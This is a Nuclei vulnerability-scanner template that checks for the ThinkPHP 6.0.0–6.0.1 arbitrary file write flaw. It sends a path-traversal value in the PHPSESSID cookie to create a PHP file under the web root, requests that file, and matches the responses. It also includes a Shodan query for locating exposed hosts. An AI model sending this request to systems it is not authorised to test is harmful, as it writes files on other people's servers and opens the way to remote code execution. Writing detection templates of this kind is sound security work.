nuclei-templates/http/vulnerabilities/thinkphp6-arbitrary-write.yaml

id: thinkphp6-arbitrary-write

info:
  name: ThinkPHP 6.0.0~6.0.1 - Arbitrary File Write
  author: arliya
  severity: critical
  description: |
    ThinkPHP 6.0.0~6.0.1 is susceptible to remote code execution. An attacker can upload any script file through this vulnerability to realize remote code execution takeover.We inject payload into PHPSESSID. In the buggy version, the payload is url encoded and returned as it is. In the fixed version, the payload is returned as a 32-bit hexadecimal string
  reference: |
    - https://community.f5.com/t5/technical-articles/thinkphp-6-0-0-6-0-1-arbitrary-file-write-vulnerability/ta-p/281591
    - https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write
    - https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/thinkphp-v6-file-write.yaml
  metadata:
    verified: true
    max-request: 2
    shodan-query: title:"ThinkPHP"
    product: thinkphp
    vendor: thinkphp
  tags: thinkphp,file-upload,rce

  classification:
    cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:*
variables:
  random_filename: "{{to_lower(rand_base(11))}}"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=/../../../public/{{random_filename}}.php
        Content-Type: application/x-www-form-urlencoded

      - |
        GET /{{random_filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: header_1
        words:
          - "Set-Cookie: PHPSESSID=%2F..%2F..%2F..%2Fpublic%2F{{random_filename}}.php"

      - type: dsl
        dsl:
          - "status_2 == 200"
# digest: 4b0a00483046022100f8d2dcd7ab599a92095428ff31bc7a4a3c09befacc814c2804ca8ff7a0a62635022100d876802d930054655ca2299f666120809dfd8976e6a6c5f4992c3ec715be665a:922c64590222798bb761d5b6d8e72950